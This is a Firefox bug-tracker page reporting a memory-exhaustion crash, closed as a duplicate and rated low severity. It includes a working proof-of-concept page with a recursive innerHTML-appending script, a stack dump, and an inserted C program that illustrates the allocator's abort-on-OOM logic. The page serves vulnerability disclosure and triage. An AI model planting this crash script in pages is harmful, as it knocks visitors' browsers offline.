Closed Bug 784501 Opened 13 years ago Closed 13 years ago

Memory Exhaustion DoS Exploit

Categories

(Core :: DOM: HTML Parser, defect)

x86
Windows 7
defect
Not set
major

Tracking

RESOLVED DUPLICATE of bug 618234

People

(Reporter: shashankcyberboy, Unassigned)

Details

(4 keywords)

Attachments

(2 files)

<!--
---------------------------------------------------
Mozilla Firefox 14.01 Memory Exhaustion DoS Exploit
---------------------------------------------------

Description:
Mozilla Firefox is prone to a memory exhaustion vulnerability. The issue has been tested on Firefox 14.01; prior versions may also be affected.

mozalloc.cpp, line 184:

int
moz_xposix_memalign(void **ptr, size_t alignment, size_t size)
{
    int err = posix_memalign(ptr, alignment, size);
    if (UNLIKELY(err && ENOMEM == err)) {
        mozalloc_handle_oom();
        return moz_xposix_memalign(ptr, alignment, size);
    }
    // else: (0 == err) or (EINVAL == err)
    return err;
}

A crafted JavaScript leads the application to crash.

Stacktrace (Windows 7 SP1):

EAX 00000000
ECX 5D923896 MSVCR100.5D923896
EDX 00000003
EBX 7FB00000 UNICODE "xxxxxxxxx [...]"
ESP 002BB7F8
EBP 002BB85C
ESI 5D8D1EC6 MSVCR100.__p__iob
EDI 5D92379C MSVCR100.fputs
EIP 73FC1999 mozalloc.73FC1999
C 0  ES 0023 32bit 0(FFFFFFFF)
P 0  CS 001B 32bit 0(FFFFFFFF)
A 0  SS 0023 32bit 0(FFFFFFFF)
Z 0  DS 0023 32bit 0(FFFFFFFF)
S 0  FS 003B 32bit 7FFDF000(C000)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_NOT_ENOUGH_MEMORY (00000008)
EFL 00000202 (NO,NB,NE,A,NS,PO,GE,G)
ST0 empty 1.0000000000000000000
ST1 empty 0.1085754583206562651
ST2 empty -0.0696429635909516231
ST3 empty 86.763962149620056150
ST4 empty 31200.200000000000730
ST5 empty 1.3451474216221712500e+15
ST6 empty 1.0390856000000000000e+10
ST7 empty 0.0
               3 2 1 0      E S P U O Z D I
FST 0022  Cond 0 0 0 0  Err 0 0 1 0 0 0 1 0  (GT)
FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1
-->
<html>
<head>
<title></title>
</head>
<body></body>
<script>
function e(x) {
    document.body.innerHTML += x;
    e(x + 'x');
}
e('x')
</script>
</html>
DoS bugs from an intentional abort on OOM do not need to remain hidden.
Group: core-security
Keywords: sec-low
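Comment 1 is the crux of the triage: the crash is mozalloc's out-of-memory handler aborting on purpose, so the worst outcome is a process exit rather than memory corruption. The program below is an added illustration, not code from this bug or from mozalloc. It reproduces the control flow of the moz_xposix_memalign snippet quoted in the attachment (retry after the OOM handler, EINVAL passed through) on top of a simulated memory budget and a pluggable handler; the budget, the handler hook and every name in it (x_posix_memalign, set_budget, set_oom_handler, run_reclaim_scenario) are constructed for the example and do not exist in mozalloc.

```c
#define _POSIX_C_SOURCE 200112L
#include <errno.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>

/* Added example, not mozalloc's code. Same shape as the quoted
 * moz_xposix_memalign: ENOMEM never reaches the caller. The real
 * mozalloc_handle_oom() aborts; here the handler is pluggable and a
 * simulated budget (constructed) lets ENOMEM be provoked on demand. */

typedef void (*oom_handler_t)(size_t size);

static size_t g_budget = 0;    /* simulated limit in bytes; 0 = unlimited */
static size_t g_in_use = 0;    /* bytes handed out under the budget */
static int    g_oom_calls = 0; /* how often the OOM handler has run */

/* Default policy, equivalent to mozalloc's: report and abort. */
static void abort_oom_handler(size_t size)
{
    fprintf(stderr, "out of memory allocating %zu bytes; aborting\n", size);
    abort();
}

static oom_handler_t g_oom_handler = abort_oom_handler;

void set_oom_handler(oom_handler_t h)
{
    g_oom_handler = h ? h : abort_oom_handler;
}

void set_budget(size_t bytes)
{
    g_budget = bytes;
    g_in_use = 0;
}

/* Fallible layer: posix_memalign plus the simulated budget. */
static int fallible_memalign(void **ptr, size_t alignment, size_t size)
{
    if (g_budget != 0 && g_in_use + size > g_budget)
        return ENOMEM;
    int err = posix_memalign(ptr, alignment, size);
    if (err == 0)
        g_in_use += size;
    return err;
}

/* Infallible layer. The handler must abort or free memory: the request is
 * retried as soon as it returns. EINVAL (bad alignment) is a programming
 * error, not exhaustion, so it is passed through unchanged. */
int x_posix_memalign(void **ptr, size_t alignment, size_t size)
{
    int err = fallible_memalign(ptr, alignment, size);
    if (err == ENOMEM) {
        g_oom_calls++;
        g_oom_handler(size);
        return x_posix_memalign(ptr, alignment, size);
    }
    return err; /* 0 or EINVAL */
}

void x_free(void *p, size_t size)
{
    free(p);
    g_in_use = size <= g_in_use ? g_in_use - size : 0;
}

/* Stand-in for a real reclaim step (dropping caches, flushing pools):
 * lifts the simulated budget so the retry can succeed. */
static void reclaim_oom_handler(size_t size)
{
    (void)size;
    g_budget = 0;
}

/* Scenario: 1 KiB budget, 2 KiB request, reclaiming handler. Returns the
 * number of handler invocations (1 on the expected path), -1 on failure. */
int run_reclaim_scenario(void)
{
    void *p = NULL;
    g_oom_calls = 0;
    set_budget(1024);
    set_oom_handler(reclaim_oom_handler);
    int err = x_posix_memalign(&p, 16, 2048);
    int calls = g_oom_calls;
    if (err == 0)
        x_free(p, 2048);
    set_oom_handler(NULL);
    set_budget(0);
    return (err == 0 && p != NULL) ? calls : -1;
}

int main(void)
{
    void *p = NULL;
    printf("handler invocations on the reclaim path: %d\n", run_reclaim_scenario());
    printf("alignment 3 -> %s\n",
           x_posix_memalign(&p, 3, 64) == EINVAL ? "EINVAL passed through" : "unexpected");
    return 0;
}
```

With the default handler installed, the same scenario ends exactly as the attachment's stack trace does: a diagnostic and an abort inside the allocator, with LastErr reporting the failed allocation. That deterministic exit is what makes an OOM-abort a denial of service and nothing more, and it is the reason such reports are rated sec-low rather than kept hidden.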
(In reply to Benjamin Smedberg [:bsmedberg] from comment #1)
> DoS bugs from an intentional abort on OOM do not need to remain hidden.

ok
Product: Firefox → Core
Version: unspecified → Trunk
Attached file WinDbg Stack
Log against Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/17.0 Firefox/17.0 ID:20120821135628 (x64 Build) with javascript.options.mem.log;true.
Status: UNCONFIRMED → NEW
Component: General → HTML: Parser
Ever confirmed: true
This is a duplicate. Please find the original and mark this a duplicate?
Whiteboard: DUPEME
I'm not sure, but maybe Bug 659333 whose Testcase uses innerHTML too?
(In reply to Boris Zbarsky (:bz) [In and out Aug 1 - 10, out Aug 11-20] from comment #5)
> This is a duplicate. Please find the original and mark this a duplicate?

sorry but it's not a duplicate :/
Status: NEW → RESOLVED
Closed: 13 years ago
Resolution: --- → DUPLICATE
Whiteboard: DUPEME